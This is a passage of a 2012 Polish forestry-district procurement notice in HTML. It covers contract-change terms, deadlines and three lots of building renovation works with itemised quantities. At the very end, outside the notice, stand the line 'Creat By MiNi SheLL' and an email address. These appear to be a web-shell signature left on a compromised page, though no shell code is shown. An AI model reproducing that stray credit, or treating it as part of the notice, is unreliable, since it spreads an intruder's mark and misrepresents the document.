17.3. Ponadto Zamawiający dopuszcza możliwość zmian redakcyjnych umowy, zmian będących następstwem zmian danych zarówno jego jak i Wykonawcy, w tym ujawnionych w rejestrach publicznych (np. zmiana oznaczenia adresu, nazwy wykonawcy, osoby uprawnionej do kontaktów) oraz innych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty. W takiej sytuacji, wprowadzenie do umowy stosownych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty nie będzie wymagało zachowania formy pisemnej, a jedynie notatki/protokołu zatwierdzonego przez przedstawicieli obu stron.

17.4. Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z przepisów prawa, w tym w szczególności nie mogą powodować wykroczenia poza określenie przedmiotu zamówienia zawarte w SIWZ, zgodnie z art. 140 ust. 3 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.) oraz nie mogą powodować obejścia przepisu art. 144 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_brzozow/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Brzozów
ul. Moniuszki 25 
36-200 Brzozów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2012 godzina 11:00, miejsce: Nadleśnictwo Brzozów
ul. Moniuszki 25 
36-200 Brzozów
sekretariat nadleśnictwa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający dopuszcza składanie ofert częściowych tylko na 1 część.
Data rozpoczęcia: od dnia zawarcia umowy
Data zakończenia: 2012.12.15
                                 2013.06.30 części III zamówienia
Szczegółowy opis sposobu przygotowania i złożenia oferty oraz szczegółowe warunki udziału w postępowaniu zawiera Specyfikacjia Istotnych Warunków Zamówienia dostępna na stronie internetowej lub w siedzibie zamawiajacego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa i remont budynku mieszkalnego l. Liszna nr  inw.165/31.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lokalizacja budynku: Sanok -Olchowce działka ewid. nr 839

1. W ramach robót modernizacyjnych wykonane  zostaną roboty:
- wymiana szalowania zewnętrznego z ociepleniem wełną mineralną 160m2
- wymiana stolarki okiennej 12 szt
- zadaszenie nad schodami wejściowymi  do mieszkania i kancelarii.
- Likwidacja drzwi garażowych,  zmniejszenie otworu, wstawienie drzwi wejściowych do kancelarii. 
- Ocieplenie podpiwniczenia płytami styropianowymi  88m2
- Wykonanie chodników z kostki brukowej  gr 6 cm - 82 m2
- Wykonanie nawierzchni z kostki brukowej gr. 8 cm - 46m2
- okładziny schodów zewnętrznych - 8,70m2
2. W ramach robót remontowych  wykonane zostaną roboty:
- demontaż boazerii drewnianej 44,2m2
- przestawienie ścianki wewnętrznej z płyty gipsowo - kartonowej 11,55m2
- rozebranie podłóg  drewnianych -27,81m2
- przetarcie tynków wewnętrznych
- posadzki z terakoty - 14,68m2
- podłoga panelowa - 13,12m2
- wymiana rurociągu c.o. 50mm - 5m
- malowane  tynków wewnętrznych - 91,43m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.00.00-9, 45.21.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 1. Modernizacja kancelarii l-ctwa Sady 149/49 
2. Remont budynku mieszkalnego Tyrawa Wołoska 165/18
3.Budynek mieszk. Siemuszowa 165/16
4.Budynek mieszkalny Dobra 165/32.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Modernizacja kancelarii l-ctwa Sady 149/49
Lokalizacja : Rozpucie, Gmina Tyrawa Wołoska nr. dz. ewid. 1233

1. Wykonanie instalacji c.o. , montaż kotła gazowego, montaż grzejników  płytowych 4 szt, montaż przewodu odprowadzenia spalin 80/125 szt 1, rurociągi miedziane 49,2m.
2. Instalacja gazowa, rurociągi stalowe 6,5m, kurki gazowe 2szt,
3. Wymiana okien drewnianych 2 szt
4. Ocieplenie stropu wełna mineralna 10 cm 59,41m2
5. Ślepy pułap z desek gr 32mm - 59,41m2
6. Ocieplenie zewnętrzne ścian styropianem  gr 10 cm i wyprawa elewacyjna z tynków akrylowych 17,04m2.
7. Rozebranie   płytki odbojowej z betonu 26,m2
8. Podbudowa z kruszywa łamanego gr 23 cm - 36,48m2
8. Nawierzchnia z kostki brukowej gr.  6 cm na podsypce cem.- piaskowej.- 36,48m2.

  Remont budynku mieszkalnego Tyrawa W. 165/18
Lokalizacja: Tyrawa Wołoska nr dz. ewid. 479

1. Rozebranie podłóg drewnianych - 84,60m2
2. Rozebranie zasypki z materiałów sypkich 8,60m2
3. Podłoża pod posadzki, podkład betonowy 8,46m3
4. Izolacja z folii podposadzkowej ,izolacja cieplna styropian 5 cm, wylewka cementowa gr 5 cm zbrojona siatką stalową -84,60m2
5. Posadzka z paneli podłogowych - 75,45m5
6. Posadzka terakota 13,48m3
7. Rozebranie nawierzchni z płyt betonowych 18m2,
8. Wjazd z kostki brukowej gr.  8 cm z wykonaniem koryta, podbudowy z pospółki gr.    20 cm, warstwy z kruszywa łamanego 15 cm - 110,72m2
9. Nawierzchnia z mieszanej mineralno bitumicznych gr 7 cm - 100m2.

Budynek mieszk. Siemuszowa 165/16
Lokalizacja: Siemuszowa gmina Tyrawa Wołoska nr dz. ewid. 484/1

1. Izolacja cieplna stropu z płyt styropianowych gr 10 cm  70,96m2
2. Rozebranie polepy z materiałów sypkich m2 70,96
3. Warstwa wyrównawcza  z zaprawy cem gr 5 cm - 70,96m2
4. Izolacja wełna mineralna gr 10 cm - 43,16m2.
5. Ślepy pułap z desek 32 na izolacji z wełny - 43,16m2
6. Zadaszenie nad drzwiami wejściowymi 3,50m2
7. Wymiana rynien  śr 15 cm - 24,0m,
8. Wymiana okładzin schodów, skucie istniejących, okładzina z elementów kamiennych 3-5cm - 7,68m2.

Budynek mieszkalny Dobra 165/32 
Lokalizacja :Dobra gmina Sanok nr dz. ewid. 82/2

1. Rozebranie podłóg drewnianych -18m2
2. Rozebranie zasypki z materiałów sypkich m3 -  2,70
3. podkład z materiałów sypkich gr 10 cm - 1,80m3
4. Podkład betonowy gr 10 cm -1,80m3
5. Izolacja  przeciwwodne z folii - 18m2
6. Izolacja cieplna styropian 5 cm  - 18m2
7. Wylewka cementowa  gr. 5 cm - 18m2
8. Posadzka z paneli podłogowych 8,43m2
9. posadzka terakota -9,57m2.
10. Wymiana drzwi wewnet4rznych z ościeżnica - 1 szt
11. Chodnik z kostki brukowej gr 6 cm, z wykonaniem koryta, podbudowy z kruszywa łamanego 22cm - 17m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.33.00.00-9, 45.21.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Budynek biurowo- mieszkalny 165/1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lokalizacja: Brzozów ul. Moniuszki 25 nr działki ewid. 1753/1, 1753/11

 1. Przebudowa  pomieszczeń wewnątrz budynku  :
-  ścianki działowe w pomieszczeniu sekretariatu z płyt gipsowo-kartonowych 21,44m2
- Remont instalacji wod -kan - wymiana pionu kanalizacji PCV 110 mm-  8,7m, podejść odpływowych PCV 50mm -3 szt, wymiana urządzeń sanitarnych - umywalka 3 szt, zlewozmywak 1 szt, 
- Remont  instalacji c.o. - wykonanie ogrzewania z podziałem na część mieszkalną i biurową, montaż kotłów gazowych dwufunkcyjnych szt 2, wymiana grzejników płytowych 6 szt, wymiana zaworów grzejnikowych 6 szt, wymiana rurociągów stalowych na miedziane -105m, 
- Wymiana rurociągu instalacji gazowej  20mm - 10,5m
- wymian skrzydeł drzwiowych - 3 szt
- licowanie ścian  płytkami glazurowanymi 40,33m2
- rozebranie podłóg drewnianych 16,32m2
- podłoże, izolacja przeciwwilgociowa,izolacja cieplna styropian 5 cm,, wylewka cementowa pod posadzkę gr. 5 cm, posadzka z drewna jesionowego -16,32m2
- demontaż boazerii - 28,3m2
- uzupełnienie tynku  szpachlowanych na ścianach -28,43m2
- wymiana posadzki z płyt kamiennych na marmurowe (holl) - 12,40m2

2. Roboty  zewnątrz budynku
- wymiana okładzin schodów zewnętrznych- 60,19 m2
- balustrada ze stali nierdzewnej - 6,2 m
- tynk cienkowarstwowy elewacji budynku typu Baranek -311,39m2
- rusztowanie zewnętrzne rurowe -320,0m2
3. Plac i parking
- demontaż  nawierzchni asfaltowej 275m2
-  wymiana obrzeży i krawężników - 49m2
- obramowanie rabatki kwiatowej z palisady prefabrykatów betonowych - 16,0 m
- kostka betonowa  gr 8 na podsypce piaskowo - cementowej gr 7 cm - 275m2
4. Mieszkanie - piętro
- wymiana  tablicy rozdzielczej instalacji elektrycznej, wyniesienie liczników pomiarowych na zewnątrz
- wymiana  przewodów instalacji elektrycznej
- demontaż boazerii
- przecierka tynków wewnętrznych po robotach demontażowych i instalacji elektrycznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.33.00.00-9, 45.21.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com